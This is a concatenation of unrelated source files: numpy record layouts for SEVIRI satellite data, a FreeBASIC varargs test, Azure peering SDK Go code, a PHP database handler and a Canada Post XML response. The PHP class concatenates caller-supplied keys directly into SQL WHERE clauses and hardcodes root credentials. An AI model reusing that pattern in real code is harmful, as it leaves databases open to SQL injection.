('RefocusingPosition', np.uint16),
('ScanRefPosFlag', np.bool),
('ScanRefPosNumber', np.uint16),
('ScanRefPosVal', np.float32),
('ScanFirstLine', np.uint16),
('ScanLastLine', np.uint16),
('RetraceStartLine', np.uint16)]
decontamination = [
('DecontaminationNow', np.bool),
('DecontaminationStart', time_cds_short),
('DecontaminationEnd', time_cds_short)]
radiometer_operations = [
('LastGainChangeFlag', np.bool),
('LastGainChangeTime', time_cds_short),
('Decontamination', decontamination),
('BBCalScheduled', np.bool),
('BBCalibrationType', np.uint8),
('BBFirstLine', np.uint16),
('BBLastLine', np.uint16),
('ColdFocalPlaneOpTemp', np.uint16),
('WarmFocalPlaneOpTemp', np.uint16)]
record = [
('PlannedAcquisitionTime', planned_acquisition_time),
('RadiometerStatus', radiometer_status),
('RadiometerSettings', radiometer_settings),
('RadiometerOperations', radiometer_operations)]
return record
@property
def celestial_events(self):
earth_moon_sun_coeff = [
('StartTime', time_cds_short),
('EndTime', time_cds_short),
('AlphaCoef', (np.float64, 8)),
('BetaCoef', (np.float64, 8))]
star_coeff = [
('StarId', np.uint16),
('StartTime', time_cds_short),
('EndTime', time_cds_short),
('AlphaCoef', (np.float64, 8)),
('BetaCoef', (np.float64, 8))]
ephemeris = [
('PeriodTimeStart', time_cds_short),
('PeriodTimeEnd', time_cds_short),
('RelatedOrbitFileTime', 'S15'),
('RelatedAttitudeFileTime', 'S15'),
('EarthEphemeris', (earth_moon_sun_coeff, 100)),
('MoonEphemeris', (earth_moon_sun_coeff, 100)),
('SunEphemeris', (earth_moon_sun_coeff, 100)),
('StarEphemeris', (star_coeff, (20, 100)))]
relation_to_image = [
('TypeOfEclipse', np.uint8),
('EclipseStartTime', time_cds_short),
('EclipseEndTime', time_cds_short),
('VisibleBodiesInImage', np.uint8),
('BodiesCloseToFOV', np.uint8),
('ImpactOnImageQuality', np.uint8)]
record = [
('CelestialBodiesPosition', ephemeris),
('RelationToImage', relation_to_image)]
return record
@property
def image_description(self):
projection_description = [
('TypeOfProjection', np.uint8),
('LongitudeOfSSP', np.float32)]
reference_grid = [
('NumberOfLines', np.int32),
('NumberOfColumns', np.int32),
('LineDirGridStep', np.float32),
('ColumnDirGridStep', np.float32),
('GridOrigin', np.uint8)]
planned_coverage_vis_ir = [
('SouthernLinePlanned', np.int32),
('NorthernLinePlanned', np.int32),
('EasternColumnPlanned', np.int32),
('WesternColumnPlanned', np.int32)]
planned_coverage_hrv = [
('LowerSouthLinePlanned', np.int32),
('LowerNorthLinePlanned', np.int32),
('LowerEastColumnPlanned', np.int32),
('LowerWestColumnPlanned', np.int32),
('UpperSouthLinePlanned', np.int32),
('UpperNorthLinePlanned', np.int32),
('UpperEastColumnPlanned', np.int32),
('UpperWestColumnPlanned', np.int32)]
level_15_image_production = [
('ImageProcDirection', np.uint8),
('PixelGenDirection', np.uint8),
('PlannedChanProcessing', (np.uint8, 12))]
record = [
('ProjectionDescription', projection_description),
('ReferenceGridVIS_IR', reference_grid),
('ReferenceGridHRV', reference_grid),
('PlannedCoverageVIS_IR', planned_coverage_vis_ir),
('PlannedCoverageHRV', planned_coverage_hrv),
('Level15ImageProduction', level_15_image_production)]
return record
@property
def radiometric_processing(self):
rp_summary = [
('RadianceLinearization', (np.bool, 12)),
('DetectorEqualization', (np.bool, 12)),
('OnboardCalibrationResult', (np.bool, 12)),
('MPEFCalFeedback', (np.bool, 12)),
('MTFAdaptation', (np.bool, 12)),
('StrayLightCorrection', (np.bool, 12))]
level_15_image_calibration = [
('CalSlope', np.float64),
('CalOffset', np.float64)]
time_cuc_size = [
('CT1', np.uint8),
('CT2', np.uint8),
('CT3', np.uint8),
('CT4', np.uint8),
('FT1', np.uint8),
('FT2', np.uint8),
('FT3', np.uint8)]
cold_fp_temperature = [
('FCUNominalColdFocalPlaneTemp', np.uint16),
('FCURedundantColdFocalPlaneTemp', np.uint16)]
warm_fp_temperature = [
('FCUNominalWarmFocalPlaneVHROTemp', np.uint16),
('FCURedundantWarmFocalPlaneVHROTemp', np.uint16)]
scan_mirror_temperature = [
('FCUNominalScanMirrorSensor1Temp', np.uint16),
('FCURedundantScanMirrorSensor1Temp', np.uint16),
('FCUNominalScanMirrorSensor2Temp', np.uint16),
('FCURedundantScanMirrorSensor2Temp', np.uint16)]
m1m2m3_temperature = [
('FCUNominalM1MirrorSensor1Temp', np.uint16),
('FCURedundantM1MirrorSensor1Temp', np.uint16),
('FCUNominalM1MirrorSensor2Temp', np.uint16),
('FCURedundantM1MirrorSensor2Temp', np.uint16),
('FCUNominalM23AssemblySensor1Temp', np.uint8),
('FCURedundantM23AssemblySensor1Temp', np.uint8),
('FCUNominalM23AssemblySensor2Temp', np.uint8),
('FCURedundantM23AssemblySensor2Temp', np.uint8)]
baffle_temperature = [
('FCUNominalM1BaffleTemp', np.uint16),
('FCURedundantM1BaffleTemp', np.uint16)]
blackbody_temperature = [
('FCUNominalBlackBodySensorTemp', np.uint16),
('FCURedundantBlackBodySensorTemp', np.uint16)]
fcu_mode = [
('FCUNominalSMMStatus', 'S2'),
('FCURedundantSMMStatus', 'S2')]
extracted_bb_data = [
('NumberOfPixelsUsed', np.uint32),
('MeanCount', np.float32),
('RMS', np.float32),
('MaxCount', np.uint16),
('MinCount', np.uint16),
('BB_Processing_Slope', np.float64),
('BB_Processing_Offset', np.float64)]
bb_related_data = [
('OnBoardBBTime', time_cuc_size),
('MDUOutGain', (np.uint16, 42)),
('MDUCoarseGain', (np.uint8, 42)),
('MDUFineGain', (np.uint16, 42)),
('MDUNumericalOffset', (np.uint16, 42)),
('PUGain', (np.uint16, 42)),
('PUOffset', (np.uint16, 27)),
('PUBias', (np.uint16, 15)),
('DCRValues', (np.uint8, 63)),
('X_DeepSpaceWindowPosition', np.int8),
('ColdFPTemperature', cold_fp_temperature),
('WarmFPTemperature', warm_fp_temperature),
('ScanMirrorTemperature', scan_mirror_temperature),
('M1M2M3Temperature', m1m2m3_temperature),
('BaffleTemperature', baffle_temperature),
('BlackBodyTemperature', blackbody_temperature),
('FCUMode', fcu_mode),
('ExtractedBBData', (extracted_bb_data, 12))]
black_body_data_used = [
('BBObservationUTC', time_cds_expanded),
('BBRelatedData', bb_related_data)]
impf_cal_data = [
('ImageQualityFlag', np.uint8),
('ReferenceDataFlag', np.uint8),
('AbsCalMethod', np.uint8),
('Pad1', 'S1'),
('AbsCalWeightVic', np.float32),
('AbsCalWeightXsat', np.float32),
('AbsCalCoeff', np.float32),
('AbsCalError', np.float32),
('GSICSCalCoeff', np.float32),
('GSICSCalError', np.float32),
('GSICSOffsetCount', np.float32)]
rad_proc_mtf_adaptation = [
('VIS_IRMTFCorrectionE_W', (np.float32, (33, 16))),
('VIS_IRMTFCorrectionN_S', (np.float32, (33, 16))),
('HRVMTFCorrectionE_W', (np.float32, (9, 16))),
('HRVMTFCorrectionN_S', (np.float32, (9, 16))),
('StraylightCorrection', (np.float32, (12, 8, 8)))]
record = [
('RPSummary', rp_summary),
('Level15ImageCalibration', (level_15_image_calibration, 12)),
('BlackBodyDataUsed', black_body_data_used),
('MPEFCalFeedback', (impf_cal_data, 12)),
('RadTransform', (np.float32, (42, 64))),
('RadProcMTFAdaptation', rad_proc_mtf_adaptation)]
return record
@property
def geometric_processing(self):
opt_axis_distances = [
('E-WFocalPlane', (np.float32, 42)),
('N_SFocalPlane', (np.float32, 42))]
earth_model = [
('TypeOfEarthModel', np.uint8),
('EquatorialRadius', np.float64),
('NorthPolarRadius', np.float64),
('SouthPolarRadius', np.float64)]
record = [
('OptAxisDistances', opt_axis_distances),
('EarthModel', earth_model),
('AtmosphericModel', (np.float32, (12, 360))),
('ResamplingFunctions', (np.uint8, 12))]
return record
@property
def impf_configuration(self):
overall_configuration = [
('Issue', np.uint16),
('Revision', np.uint16)
]
sw_version = overall_configuration
info_base_versions = sw_version
su_configuration = [
('SWVersion', sw_version),
('InfoBaseVersions', (info_base_versions, 10))
]
su_details = [
('SUId', GSDTRecords.gp_su_id),
('SUIdInstance', np.int8),
('SUMode', np.uint8),
('SUState', np.uint8),
('SUConfiguration', su_configuration)
]
equalisation_params = [
('ConstCoeff', np.float32),
('LinearCoeff', np.float32),
('QuadraticCoeff', np.float32)
]
black_body_data_for_warm_start = [
('GTotalForMethod1', (np.float64, 12)),
('GTotalForMethod2', (np.float64, 12)),
('GTotalForMethod3', (np.float64, 12)),
('GBackForMethod1', (np.float64, 12)),
('GBackForMethod2', (np.float64, 12)),
('GBackForMethod3', (np.float64, 12)),
('RatioGTotalToGBack', (np.float64, 12)),
('GainInFrontOpticsCont', (np.float64, 12)),
('CalibrationConstants', (np.float32, 12)),
('maxIncidentRadiance', (np.float64, 12)),
('TimeOfColdObsSeconds', np.float64),
('TimeOfColdObsNanoSecs', np.float64),
('IncidenceRadiance', (np.float64, 12)),
('TempCal', np.float64),
('TempM1', np.float64),
('TempScan', np.float64),
('TempM1Baf', np.float64),
('TempCalSurround', np.float64)
]
mirror_parameters = [
('MaxFeedbackVoltage', np.float64),
('MinFeedbackVoltage', np.float64),
('MirrorSlipEstimate', np.float64)
]
hktm_parameters = [
('TimeS0Packet', time_cds_short),
('TimeS1Packet', time_cds_short),
('TimeS2Packet', time_cds_short),
('TimeS3Packet', time_cds_short),
('TimeS4Packet', time_cds_short),
('TimeS5Packet', time_cds_short),
('TimeS6Packet', time_cds_short),
('TimeS7Packet', time_cds_short),
('TimeS8Packet', time_cds_short),
('TimeS9Packet', time_cds_short),
('TimeSYPacket', time_cds_short),
('TimePSPacket', time_cds_short)
]
warm_start_params = [
('ScanningLaw', (np.float64, 1527)),
('RadFramesAlignment', (np.float64, 3)),
('ScanningLawVariation', (np.float32, 2)),
('EqualisationParams', (equalisation_params, 42)),
('BlackBodyDataForWarmStart', black_body_data_for_warm_start),
('MirrorParameters', mirror_parameters),
('LastSpinPeriod', np.float64),
('HKTMParameters', hktm_parameters),
('WSPReserved', (np.uint8, 3312))
]
record = [
('OverallConfiguration', overall_configuration),
('SUDetails', (su_details, 50)),
('WarmStartParams', warm_start_params)
]
return record
class Msg15NativeTrailerRecord(object):
"""
SEVIRI Level 1.5 trailer for native-format
Reference Document (EUM/MSG/ICD/105):
MSG Level 1.5 Image Data Format Description
"""
def get(self):
# 380363 bytes
record = [
('GP_PK_HEADER', GSDTRecords.gp_pk_header),
('GP_PK_SH1', GSDTRecords.gp_pk_sh1),
('15TRAILER', self.seviri_l15_trailer)
]
return np.dtype(record).newbyteorder('>')
@property
def seviri_l15_trailer(self):
record = [
('15TrailerVersion', np.uint8),
('ImageProductionStats', self.image_production_stats),
('NavigationExtractionResults', self.navigation_extraction_results),
('RadiometricQuality', self.radiometric_quality),
('GeometricQuality', self.geometric_quality),
('TimelinessAndCompleteness', self.timeliness_and_completeness)
]
return record
@property
def image_production_stats(self):
gp_sc_id = GSDTRecords.gp_sc_id
actual_scanning_summary = [
('NominalImageScanning', np.uint8),
('ReducedScan', np.uint8),
('ForwardScanStart', time_cds_short),
('ForwardScanEnd', time_cds_short)
]
radiometric_behaviour = [
('NominalBehaviour', np.uint8),
('RadScanIrregularity', np.uint8),
('RadStoppage', np.uint8),
('RepeatCycleNotCompleted', np.uint8),
('GainChangeTookPlace', np.uint8),
('DecontaminationTookPlace', np.uint8),
('NoBBCalibrationAchieved', np.uint8),
('IncorrectTemperature', np.uint8),
('InvalidBBData', np.uint8),
('InvalidAuxOrHKTMData', np.uint8),
('RefocusingMechanismActuated', np.uint8),
('MirrorBackToReferencePos', np.uint8)
]
reception_summary_stats = [
('PlannedNumberOfL10Lines', (np.uint32, 12)),
('NumberOfMissingL10Lines', (np.uint32, 12)),
('NumberOfCorruptedL10Lines', (np.uint32, 12)),
('NumberOfReplacedL10Lines', (np.uint32, 12))
]
l15_image_validity = [
('NominalImage', np.uint8),
('NonNominalBecauseIncomplete', np.uint8),
('NonNominalRadiometricQuality', np.uint8),
('NonNominalGeometricQuality', np.uint8),
('NonNominalTimeliness', np.uint8),
('IncompleteL15', np.uint8),
]
actual_l15_coverage_vis_ir = [
('SouthernLineActual', np.int32),
('NorthernLineActual', np.int32),
('EasternColumnActual', np.int32),
('WesternColumnActual', np.int32)
]
actual_l15_coverage_hrv = [
('LowerSouthLineActual', np.int32),
('LowerNorthLineActual', np.int32),
('LowerEastColumnActual', np.int32),
('LowerWestColumnActual', np.int32),
('UpperSouthLineActual', np.int32),
('UpperNorthLineActual', np.int32),
('UpperEastColumnActual', np.int32),
('UpperWestColumnActual', np.int32),
]
record = [
('SatelliteId', gp_sc_id),
('ActualScanningSummary', actual_scanning_summary),
('RadiometricBehaviour', radiometric_behaviour),
('ReceptionSummaryStats', reception_summary_stats),
('L15ImageValidity', (l15_image_validity, 12)),
('ActualL15CoverageVIS_IR', actual_l15_coverage_vis_ir),
('ActualL15CoverageHRV', actual_l15_coverage_hrv)
]
return record
@property
def navigation_extraction_results(self):
horizon_observation = [
('HorizonId', np.uint8),
('Alpha', np.float64),
('AlphaConfidence', np.float64),
('Beta', np.float64),
('BetaConfidence', np.float64),
('ObservationTime', time_cds),
('SpinRate', np.float64),
('AlphaDeviation', np.float64),
('BetaDeviation', np.float64)
]
star_observation = [
('StarId', np.uint16),
('Alpha', np.float64),
('AlphaConfidence', np.float64),
('Beta', np.float64),
('BetaConfidence', np.float64),
('ObservationTime', time_cds),
('SpinRate', np.float64),
('AlphaDeviation', np.float64),
('BetaDeviation', np.float64)
]
landmark_observation = [
('LandmarkId', np.uint16),
('LandmarkLongitude', np.float64),
('LandmarkLatitude', np.float64),
('Alpha', np.float64),
('AlphaConfidence', np.float64),
('Beta', np.float64),
('BetaConfidence', np.float64),
('ObservationTime', time_cds),
('SpinRate', np.float64),
('AlphaDeviation', np.float64),
('BetaDeviation', np.float64)
]
record = [
('ExtractedHorizons', (horizon_observation, 4)),
('ExtractedStars', (star_observation, 20)),
('ExtractedLandmarks', (landmark_observation, 50))
]
return record
@property
def radiometric_quality(self):
l10_rad_quality = [
('FullImageMinimumCount', np.uint16),
('FullImageMaximumCount', np.uint16),
('EarthDiskMinimumCount', np.uint16),
('EarthDiskMaximumCount', np.uint16),
('MoonMinimumCount', np.uint16),
('MoonMaximumCount', np.uint16),
('FullImageMeanCount', np.float32),
('FullImageStandardDeviation', np.float32),
('EarthDiskMeanCount', np.float32),
('EarthDiskStandardDeviation', np.float32),
('MoonMeanCount', np.float32),
('MoonStandardDeviation', np.float32),
('SpaceMeanCount', np.float32),
('SpaceStandardDeviation', np.float32),
('SESpaceCornerMeanCount', np.float32),
('SESpaceCornerStandardDeviation', np.float32),
('SWSpaceCornerMeanCount', np.float32),
('SWSpaceCornerStandardDeviation', np.float32),
('NESpaceCornerMeanCount', np.float32),
('NESpaceCornerStandardDeviation', np.float32),
('NWSpaceCornerMeanCount', np.float32),
('NWSpaceCornerStandardDeviation', np.float32),
('4SpaceCornersMeanCount', np.float32),
('4SpaceCornersStandardDeviation', np.float32),
('FullImageHistogram', (np.uint32, 256)),
('EarthDiskHistogram', (np.uint32, 256)),
('ImageCentreSquareHistogram', (np.uint32, 256)),
('SESpaceCornerHistogram', (np.uint32, 128)),
('SWSpaceCornerHistogram', (np.uint32, 128)),
('NESpaceCornerHistogram', (np.uint32, 128)),
('NWSpaceCornerHistogram', (np.uint32, 128)),
('FullImageEntropy', (np.float32, 3)),
('EarthDiskEntropy', (np.float32, 3)),
('ImageCentreSquareEntropy', (np.float32, 3)),
('SESpaceCornerEntropy', (np.float32, 3)),
('SWSpaceCornerEntropy', (np.float32, 3)),
('NESpaceCornerEntropy', (np.float32, 3)),
('NWSpaceCornerEntropy', (np.float32, 3)),
('4SpaceCornersEntropy', (np.float32, 3)),
('ImageCentreSquarePSD_EW', (np.float32, 128)),
('FullImagePSD_EW', (np.float32, 128)),
('ImageCentreSquarePSD_NS', (np.float32, 128)),
('FullImagePSD_NS', (np.float32, 128))
]
l15_rad_quality = [
('FullImageMinimumCount', np.uint16),
('FullImageMaximumCount', np.uint16),
('EarthDiskMinimumCount', np.uint16),
('EarthDiskMaximumCount', np.uint16),
('FullImageMeanCount', np.float32),
('FullImageStandardDeviation', np.float32),
('EarthDiskMeanCount', np.float32),
('EarthDiskStandardDeviation', np.float32),
('SpaceMeanCount', np.float32),
('SpaceStandardDeviation', np.float32),
('FullImageHistogram', (np.uint32, 256)),
('EarthDiskHistogram', (np.uint32, 256)),
('ImageCentreSquareHistogram', (np.uint32, 256)),
('FullImageEntropy', (np.float32, 3)),
('EarthDiskEntropy', (np.float32, 3)),
('ImageCentreSquareEntropy', (np.float32, 3)),
('ImageCentreSquarePSD_EW', (np.float32, 128)),
('FullImagePSD_EW', (np.float32, 128)),
('ImageCentreSquarePSD_NS', (np.float32, 128)),
('FullImagePSD_NS', (np.float32, 128)),
('SESpaceCornerL15_RMS', np.float32),
('SESpaceCornerL15_Mean', np.float32),
('SWSpaceCornerL15_RMS', np.float32),
('SWSpaceCornerL15_Mean', np.float32),
('NESpaceCornerL15_RMS', np.float32),
('NESpaceCornerL15_Mean', np.float32),
('NWSpaceCornerL15_RMS', np.float32),
('NWSpaceCornerL15_Mean', np.float32)
]
record = [
('L10RadQuality', (l10_rad_quality, 42)),
('L15RadQuality', (l15_rad_quality, 12))
]
return record
@property
def geometric_quality(self):
absolute_accuracy = [
('QualityInfoValidity', np.uint8),
('EastWestAccuracyRMS', np.float32),
('NorthSouthAccuracyRMS', np.float32),
('MagnitudeRMS', np.float32),
('EastWestUncertaintyRMS', np.float32),
('NorthSouthUncertaintyRMS', np.float32),
('MagnitudeUncertaintyRMS', np.float32),
('EastWestMaxDeviation', np.float32),
('NorthSouthMaxDeviation', np.float32),
('MagnitudeMaxDeviation', np.float32),
('EastWestUncertaintyMax', np.float32),
('NorthSouthUncertaintyMax', np.float32),
('MagnitudeUncertaintyMax', np.float32)
]
relative_accuracy = absolute_accuracy
pixels_500_relative_accuracy = absolute_accuracy
pixels_16_relative_accuracy = absolute_accuracy
misregistration_residuals = [
('QualityInfoValidity', np.uint8),
('EastWestResidual', np.float32),
('NorthSouthResidual', np.float32),
('EastWestUncertainty', np.float32),
('NorthSouthUncertainty', np.float32),
('EastWestRMS', np.float32),
('NorthSouthRMS', np.float32),
('EastWestMagnitude', np.float32),
('NorthSouthMagnitude', np.float32),
('EastWestMagnitudeUncertainty', np.float32),
('NorthSouthMagnitudeUncertainty', np.float32)
]
geometric_quality_status = [
('QualityNominal', np.uint8),
('NominalAbsolute', np.uint8),
('NominalRelativeToPreviousImage', np.uint8),
('NominalForREL500', np.uint8),
('NominalForREL16', np.uint8),
('NominalForResMisreg', np.uint8)
]
record = [
('AbsoluteAccuracy', (absolute_accuracy, 12)),
('RelativeAccuracy', (relative_accuracy, 12)),
('500PixelsRelativeAccuracy', (pixels_500_relative_accuracy, 12)),
('16PixelsRelativeAccuracy', (pixels_16_relative_accuracy, 12)),
('MisregistrationResiduals', (misregistration_residuals, 12)),
('GeometricQualityStatus', (geometric_quality_status, 12))
]
return record
@property
def timeliness_and_completeness(self):
timeliness = [
('MaxDelay', np.float32),
('MinDelay', np.float32),
('MeanDelay', np.float32)
]
completeness = [
('PlannedL15ImageLines', np.uint16),
('GeneratedL15ImageLines', np.uint16),
('ValidL15ImageLines', np.uint16),
('DummyL15ImageLines', np.uint16),
('CorruptedL15ImageLines', np.uint16)
]
record = [
('Timeliness', timeliness),
('Completeness', (completeness, 12))
]
return record
class HritPrologue(L15DataHeaderRecord):
def get(self):
# X bytes
record = [
('SatelliteStatus', self.satellite_status),
('ImageAcquisition', self.image_acquisition),
('CelestialEvents', self.celestial_events),
('ImageDescription', self.image_description),
('RadiometricProcessing', self.radiometric_processing),
('GeometricProcessing', self.geometric_processing)
]
return np.dtype(record).newbyteorder('>')
hrit_epilogue = np.dtype(
Msg15NativeTrailerRecord().seviri_l15_trailer).newbyteorder('>')
hrit_prologue = HritPrologue().get()
impf_configuration = np.dtype(
L15DataHeaderRecord().impf_configuration).newbyteorder('>')
native_header = Msg15NativeHeaderRecord().get()
native_trailer = Msg15NativeTrailerRecord().get()
| {
"pile_set_name": "Github"
} |
# include "fbcunit.bi"
#if (__FB_BACKEND__ = "gas")
#define DOTEST
#endif
'' for other targets, see va_int_and_ptrs-gcc.bas
#ifdef DOTEST
SUITE( fbc_tests.functions.va_int_and_ptrs )
sub varints cdecl ( byval n as integer, ... )
dim va as any ptr
dim i as integer
va = va_first( )
for i = 1 to n
CU_ASSERT( va_arg( va, integer ) = i )
va = va_next( va, integer )
next
end sub
sub varintptrs cdecl ( byval n as integer, ... )
dim va as any ptr
dim i as integer
va = va_first( )
for i = 1 to n
CU_ASSERT( *va_arg( va, integer ptr ) )
va = va_next( va, integer ptr )
next
end sub
sub vaints_test( d as integer )
dim as integer a, b, c
dim as integer ptr pa, pb, pc
dim as integer ptr ptr ppc
a = 1
b = 2
c = 3
pa = @a
pb = @b
pc = @c
ppc = @pc
varints 4, a, *pb, **ppc, d
varintptrs 4, pa, pb, pc, @d
end sub
TEST( varIntegerArgs )
vaints_test 4
END_TEST
END_SUITE
#endif
| {
"pile_set_name": "Github"
} |
package peering
// Copyright (c) Microsoft and contributors. All rights reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
//
// See the License for the specific language governing permissions and
// limitations under the License.
//
// Code generated by Microsoft (R) AutoRest Code Generator.
// Changes may cause incorrect behavior and will be lost if the code is regenerated.
import (
"context"
"github.com/Azure/go-autorest/autorest"
"github.com/Azure/go-autorest/autorest/azure"
"github.com/Azure/go-autorest/tracing"
"net/http"
)
// OperationsClient is the peering Client
type OperationsClient struct {
BaseClient
}
// NewOperationsClient creates an instance of the OperationsClient client.
func NewOperationsClient(subscriptionID string) OperationsClient {
return NewOperationsClientWithBaseURI(DefaultBaseURI, subscriptionID)
}
// NewOperationsClientWithBaseURI creates an instance of the OperationsClient client using a custom endpoint. Use this
// when interacting with an Azure cloud that uses a non-standard base URI (sovereign clouds, Azure stack).
func NewOperationsClientWithBaseURI(baseURI string, subscriptionID string) OperationsClient {
return OperationsClient{NewWithBaseURI(baseURI, subscriptionID)}
}
// List lists all of the available API operations for peering resources.
func (client OperationsClient) List(ctx context.Context) (result OperationListResultPage, err error) {
if tracing.IsEnabled() {
ctx = tracing.StartSpan(ctx, fqdn+"/OperationsClient.List")
defer func() {
sc := -1
if result.olr.Response.Response != nil {
sc = result.olr.Response.Response.StatusCode
}
tracing.EndSpan(ctx, sc, err)
}()
}
result.fn = client.listNextResults
req, err := client.ListPreparer(ctx)
if err != nil {
err = autorest.NewErrorWithError(err, "peering.OperationsClient", "List", nil, "Failure preparing request")
return
}
resp, err := client.ListSender(req)
if err != nil {
result.olr.Response = autorest.Response{Response: resp}
err = autorest.NewErrorWithError(err, "peering.OperationsClient", "List", resp, "Failure sending request")
return
}
result.olr, err = client.ListResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "peering.OperationsClient", "List", resp, "Failure responding to request")
}
if result.olr.hasNextLink() && result.olr.IsEmpty() {
err = result.NextWithContext(ctx)
}
return
}
// ListPreparer prepares the List request.
func (client OperationsClient) ListPreparer(ctx context.Context) (*http.Request, error) {
const APIVersion = "2020-04-01"
queryParameters := map[string]interface{}{
"api-version": APIVersion,
}
preparer := autorest.CreatePreparer(
autorest.AsGet(),
autorest.WithBaseURL(client.BaseURI),
autorest.WithPath("/providers/Microsoft.Peering/operations"),
autorest.WithQueryParameters(queryParameters))
return preparer.Prepare((&http.Request{}).WithContext(ctx))
}
// ListSender sends the List request. The method will close the
// http.Response Body if it receives an error.
func (client OperationsClient) ListSender(req *http.Request) (*http.Response, error) {
return client.Send(req, autorest.DoRetryForStatusCodes(client.RetryAttempts, client.RetryDuration, autorest.StatusCodesForRetry...))
}
// ListResponder handles the response to the List request. The method always
// closes the http.Response Body.
func (client OperationsClient) ListResponder(resp *http.Response) (result OperationListResult, err error) {
err = autorest.Respond(
resp,
azure.WithErrorUnlessStatusCode(http.StatusOK),
autorest.ByUnmarshallingJSON(&result),
autorest.ByClosing())
result.Response = autorest.Response{Response: resp}
return
}
// listNextResults retrieves the next set of results, if any.
func (client OperationsClient) listNextResults(ctx context.Context, lastResults OperationListResult) (result OperationListResult, err error) {
req, err := lastResults.operationListResultPreparer(ctx)
if err != nil {
return result, autorest.NewErrorWithError(err, "peering.OperationsClient", "listNextResults", nil, "Failure preparing next results request")
}
if req == nil {
return
}
resp, err := client.ListSender(req)
if err != nil {
result.Response = autorest.Response{Response: resp}
return result, autorest.NewErrorWithError(err, "peering.OperationsClient", "listNextResults", resp, "Failure sending next results request")
}
result, err = client.ListResponder(resp)
if err != nil {
err = autorest.NewErrorWithError(err, "peering.OperationsClient", "listNextResults", resp, "Failure responding to next results request")
}
return
}
// ListComplete enumerates all values, automatically crossing page boundaries as required.
func (client OperationsClient) ListComplete(ctx context.Context) (result OperationListResultIterator, err error) {
if tracing.IsEnabled() {
ctx = tracing.StartSpan(ctx, fqdn+"/OperationsClient.List")
defer func() {
sc := -1
if result.Response().Response.Response != nil {
sc = result.page.Response().Response.Response.StatusCode
}
tracing.EndSpan(ctx, sc, err)
}()
}
result.page, err = client.List(ctx)
return
}
| {
"pile_set_name": "Github"
} |
<?php
class DBProcess extends Unit
{
const DB_HOST='localhost';
const DB_USER='root';
const DB_PASS='root';
const DB_DBNAME='testDB';
public function stimulate(&$hash){
$db = new MYSQL;
$db->connect(self::DB_HOST, self::DB_USER, self::DB_PASS, self::DB_DBNAME);
$db->query("SET NAMES 'UTF8'");
//must have a string parameter 'action'
LINB::checkArgs($hash, array(
'string' => array(
'action' => NULL
)
));
//handle the process
switch($hash->action) {
case 'getlist':
return $db->query("select `key`,`value` from `tbl_test`");
case 'update':
//must have string parameters 'key' and 'value'
LINB::checkArgs($hash, array(
'string' => array(
'key' => NULL,
'value' => NULL
)
));
$db->update("tbl_test",array("key"=>$hash->key, "value"=>$hash->value), "`key`='".$hash->key."'");
return 'ok';
case 'delete':
//must have a string parameter 'key'
LINB::checkArgs($hash, array(
'string' => array(
'key' => NULL
)
));
$db->delete("tbl_test", "`key`='".$hash->key."'");
return 'ok';
case 'create':
//must have string parameters 'key' and 'value'
LINB::checkArgs($hash, array(
'string' => array(
'key' => NULL,
'value' => NULL
)
));
$db->insert("tbl_test", array("key"=>$hash->key, "value"=>$hash->value));
return 'ok';
}
}
}
?>
| {
"pile_set_name": "Github"
} |
<?xml version="1.0"?>
<!DOCTYPE eparcel [
<!-- EVERY REQUEST CONTAIN THE eparcel TAG -->
<!ELEMENT eparcel (ratesAndServicesResponse)>
<!-- ********************************************************* -->
<!-- * Standard response for request for rates and services * -->
<!-- ********************************************************* -->
<!ELEMENT ratesAndServicesResponse (statusCode , statusMessage+ , requestID , handling , language , product+ , packing* , emptySpace* , shippingOptions , comment , nearestPostalOutlet*)>
<!ELEMENT statusCode (#PCDATA)>
<!ELEMENT statusMessage (#PCDATA)>
<!ELEMENT requestID (#PCDATA)>
<!ELEMENT handling (#PCDATA)>
<!ELEMENT language (#PCDATA)>
<!ELEMENT product (name , rate , shippingDate , deliveryDate , deliveryDayOfWeek , nextDayAM? , packingID)>
<!ATTLIST product id CDATA #REQUIRED>
<!ATTLIST product sequence CDATA #REQUIRED>
<!ELEMENT name (#PCDATA)>
<!ELEMENT rate (#PCDATA)>
<!ELEMENT shippingDate (#PCDATA)>
<!ELEMENT deliveryDate (#PCDATA)>
<!ELEMENT deliveryDayOfWeek (#PCDATA)>
<!ELEMENT nextDayAM (#PCDATA)>
<!ELEMENT packingID (#PCDATA)>
<!ELEMENT packing (packingID , box+)>
<!ELEMENT box (name , weight , expediterWeight , length , width , height , packedItem+)>
<!ELEMENT weight (#PCDATA)>
<!ELEMENT expediterWeight (#PCDATA)>
<!ELEMENT length (#PCDATA)>
<!ELEMENT width (#PCDATA)>
<!ELEMENT height (#PCDATA)>
<!ELEMENT packedItem (quantity , description)>
<!ELEMENT quantity (#PCDATA)>
<!ELEMENT description (#PCDATA)>
<!ELEMENT emptySpace (length , width , height , weight)>
<!ELEMENT shippingOptions (insurance , deliveryConfirmation , signature , flexiblePaymentAvailable?)>
<!ELEMENT insurance (#PCDATA)>
<!ELEMENT deliveryConfirmation (#PCDATA)>
<!ELEMENT signature (#PCDATA)>
<!ELEMENT flexiblePaymentAvailable EMPTY>
<!ELEMENT comment (#PCDATA)>
<!-- ********************************************************* -->
<!-- * 'nearestPostalOutlet' is optional and is returned * -->
<!-- * only if the merchant profile has this option enabled * -->
<!-- ********************************************************* -->
<!ELEMENT nearestPostalOutlet (postalOutletSequenceNo , distance , outletName , businessName , postalAddress , phoneNumber , businessHours+)>
<!ELEMENT postalOutletSequenceNo (#PCDATA)>
<!ELEMENT distance (#PCDATA)>
<!ELEMENT outletName (#PCDATA)>
<!ELEMENT businessName (#PCDATA)>
<!ELEMENT postalAddress (addressLine+ , postalCode , municipality , province?)>
<!ELEMENT addressLine (#PCDATA)>
<!ELEMENT postalCode (#PCDATA)>
<!ELEMENT municipality (#PCDATA)>
<!ELEMENT province (#PCDATA)>
<!ELEMENT phoneNumber (#PCDATA)>
<!ELEMENT businessHours (dayId , dayOfWeek , time)>
<!ELEMENT dayId (#PCDATA)>
<!ELEMENT dayOfWeek (#PCDATA)>
<!ELEMENT time (#PCDATA)>
]>
<eparcel>
<ratesAndServicesResponse>
<statusCode>1</statusCode>
<statusMessage>OK</statusMessage>
<requestID>6877575</requestID>
<handling>0.0</handling>
<language>0</language>
